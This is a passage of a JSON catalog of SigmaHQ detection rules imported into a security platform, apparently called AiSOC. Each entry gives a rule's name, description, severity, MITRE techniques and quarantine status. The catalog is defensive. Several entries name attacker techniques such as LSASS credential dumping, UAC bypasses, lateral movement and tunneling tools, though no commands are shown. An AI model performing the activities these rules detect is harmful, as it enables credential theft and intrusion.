"detections/sigma-imports/_quarantine/powershell-deleted-mounted-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66a4d409-451b-4151-94f4-a55d559c49b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" } }, { "id": "sigmahq-sigma-66b6be3d-55d0-4f47-9855-d69df21740ea", "type": "detection", "name": "Local User Creation", "description": "Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-user-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66b6be3d-55d0-4f47-9855-d69df21740ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_creation.yml" } }, { "id": "sigmahq-sigma-66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "type": "detection", "name": "Potential Crypto Mining Activity", "description": "Detects command line parameters or strings often used by crypto miners", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/potential-crypto-mining-activity.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_crypto_mining_monero.yml" } }, { "id": "sigmahq-sigma-66d31e5f-52d6-40a4-9615-002d3789a119", "type": "detection", "name": "Remote Thread Creation By Uncommon Source Image", "description": "Detects uncommon processes creating remote threads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-by-uncommon-source-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66d31e5f-52d6-40a4-9615-002d3789a119", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml" } }, { "id": "sigmahq-sigma-66e563f9-1cbd-4a22-a957-d8b7c0f44372", "type": "detection", "name": "HackTool - XORDump Execution", "description": "Detects suspicious use of XORDump process memory dumping utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-xordump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_xordump.yml" } }, { "id": "sigmahq-sigma-671ffc77-50a7-464f-9e3d-9ea2b493b26b", "type": "detection", "name": "Cisco Modify Configuration", "description": "Modifications to a config that will serve an adversary's impacts or persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490", "T1505", "T1565.002", "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-modify-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_modify_config.yml" } }, { "id": "sigmahq-sigma-674202d0-b22a-4af4-ae5f-2eda1f3da1af", "type": "detection", "name": "Bypass UAC Using Event Viewer", "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-using-event-viewer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" } }, { "id": "sigmahq-sigma-676381a6-15ca-4d73-a9c8-6a22e970b90d", "type": "detection", "name": "Local Groups Discovery - Linux", "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-groups-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "676381a6-15ca-4d73-a9c8-6a22e970b90d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_local_groups.yml" } }, { "id": "sigmahq-sigma-6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "type": "detection", "name": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outlook-enableunsafeclientmailrules-setting-enabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" } }, { "id": "sigmahq-sigma-679085d5-f427-4484-9f58-1dc30a7c426d", "type": "detection", "name": "WinDivert Driver Load", "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1599.001", "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windivert-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "679085d5-f427-4484-9f58-1dc30a7c426d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_windivert.yml" } }, { "id": "sigmahq-sigma-67a6c006-3fbe-46a7-9074-2ba3b82c3000", "type": "detection", "name": "Path To Screensaver Binary Modified", "description": "Detects value modification of registry key containing path to binary used as screensaver.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/path-to-screensaver-binary-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" } }, { "id": "sigmahq-sigma-67add051-9ee7-4ad3-93ba-42935615ae8d", "type": "detection", "name": "PUA - Process Hacker Driver Load", "description": "Detects driver load of the Process Hacker tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-process-hacker-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67add051-9ee7-4ad3-93ba-42935615ae8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_pua_process_hacker.yml" } }, { "id": "sigmahq-sigma-67bc0e75-c0a9-4cfc-8754-84a505b63c04", "type": "detection", "name": "Potentially Suspicious Child Process Of ClickOnce Application", "description": "Detects potentially suspicious child processes of a ClickOnce deployment application", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-clickonce-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67bc0e75-c0a9-4cfc-8754-84a505b63c04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml" } }, { "id": "sigmahq-sigma-67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", "type": "detection", "name": "Measurable Increase Of Successful Authentications", "description": "Detects when successful sign-ins increased by 10% or greater.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/measurable-increase-of-successful-authentications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml" } }, { "id": "sigmahq-sigma-67f113fa-e23d-4271-befa-30113b3e08b1", "type": "detection", "name": "Suspicious JavaScript Execution Via Mshta.EXE", "description": "Detects execution of javascript code using \"mshta.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-javascript-execution-via-mshta-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67f113fa-e23d-4271-befa-30113b3e08b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" } }, { "id": "sigmahq-sigma-68050b10-e477-4377-a99b-3721b422d6ef", "type": "detection", "name": "Remote DCOM/WMI Lateral Movement", "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003", "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-dcom-wmi-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68050b10-e477-4377-a99b-3721b422d6ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" } }, { "id": "sigmahq-sigma-6812a10b-60ea-420c-832f-dfcc33b646ba", "type": "detection", "name": "Potential PowerShell Execution Via DLL", "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.\nThis detection assumes that PowerShell commands are passed via the CommandLine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-execution-via-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6812a10b-60ea-420c-832f-dfcc33b646ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_powershell_execution_via_dll.yml" } }, { "id": "sigmahq-sigma-68578b43-65df-4f81-9a9b-92f32711a951", "type": "detection", "name": "UAC Bypass Using Windows Media Player - File", "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-windows-media-player-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68578b43-65df-4f81-9a9b-92f32711a951", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" } }, { "id": "sigmahq-sigma-68654bf0-4412-43d5-bfe8-5eaa393cd939", "type": "detection", "name": "Potential DLL Sideloading Via JsSchHlp", "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-jsschhlp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_jsschhlp.yml" } }, { "id": "sigmahq-sigma-686c0b4b-9dd3-4847-9077-d6c1bbe36fcb", "type": "detection", "name": "Windows Defender Virus Scanning Feature Disabled", "description": "Detects disabling of the Windows Defender virus scanning feature", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-virus-scanning-feature-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "686c0b4b-9dd3-4847-9077-d6c1bbe36fcb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_virus_scan_disabled.yml" } }, { "id": "sigmahq-sigma-6897cd82-6664-11ed-9022-0242ac120002", "type": "detection", "name": "PST Export Alert Using New-ComplianceSearchAction", "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pst-export-alert-using-new-compliancesearchaction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6897cd82-6664-11ed-9022-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" } }, { "id": "sigmahq-sigma-68b8547b-107f-43f3-97fb-900a7d63c190", "type": "detection", "name": "OpenCanary - NMAP NULL Scan", "description": "Detects instances where an OpenCanary node has been targeted by a NMAP NULL Scan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-nmap-null-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68b8547b-107f-43f3-97fb-900a7d63c190", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_nmap_null_scan.yml" } }, { "id": "sigmahq-sigma-68bcd73b-37ef-49cb-95fc-edc809730be6", "type": "detection", "name": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-unquoted-service-path-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml" } }, { "id": "sigmahq-sigma-68c2c604-92ad-468b-bf4a-aac49adad08c", "type": "detection", "name": "HTTP Request to Low Reputation TLD or Suspicious File Extension", "description": "Detects HTTP requests to low reputation TLDs (e.g. .xyz, .top, .ru) or ending in suspicious file extensions (.exe, .dll, .hta), which may indicate malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/http-request-to-low-reputation-tld-or-suspicious-file-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68c2c604-92ad-468b-bf4a-aac49adad08c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_http_susp_file_ext_from_susp_tld.yml" } }, { "id": "sigmahq-sigma-68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "type": "detection", "name": "HH.EXE Execution", "description": "Detects the execution of \"hh.exe\" to open \".chm\" files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hh-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml" } }, { "id": "sigmahq-sigma-68d37776-61db-42f5-bf54-27e87072d17e", "type": "detection", "name": "PUA - NPS Tunneling Tool Execution", "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nps-tunneling-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68d37776-61db-42f5-bf54-27e87072d17e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nps.yml" } }, { "id": "sigmahq-sigma-6902955a-01b7-432c-b32a-6f5f81d8f625", "type": "detection", "name": "LSASS Process Dump Artefact In CrashDumps Folder", "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-dump-artefact-in-crashdumps-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" } }, { "id": "sigmahq-sigma-692f0bec-83ba-4d04-af7e-e884a96059b6", "type": "detection", "name": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/potential-wmi-lateral-movement-wmiprvse-spawned-powershell.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "692f0bec-83ba-4d04-af7e-e884a96059b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml" } }, { "id": "sigmahq-sigma-6938366d-8954-4ddc-baff-c830b3ba8fcd", "type": "detection", "name": "HackTool - Certipy Execution", "description": "Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-certipy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_certipy.yml" } }, { "id": "sigmahq-sigma-693a44e9-7f26-4cb6-b787-214867672d3a", "type": "detection", "name": "Sysmon File Executable Creation Detected", "description": "Triggers on any Sysmon \"FileExecutableDetected\" event, which triggers every time a PE that is monitored by the config is created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-file-executable-creation-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "693a44e9-7f26-4cb6-b787-214867672d3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_file_executable_detected.yml" } }, { "id": "sigmahq-sigma-6942bd25-5970-40ab-af49-944247103358", "type": "detection", "name": "Suspicious Get Information for SMB Share - PowerShell Module", "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-information-for-smb-share-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6942bd25-5970-40ab-af49-944247103358", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" } }, { "id": "sigmahq-sigma-69483748-1525-4a6c-95ca-90dc8d431b68", "type": "detection", "name": "Suspicious Microsoft Office Child Process - MacOS", "description": "Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.002", "T1137.002", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-microsoft-office-child-process-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 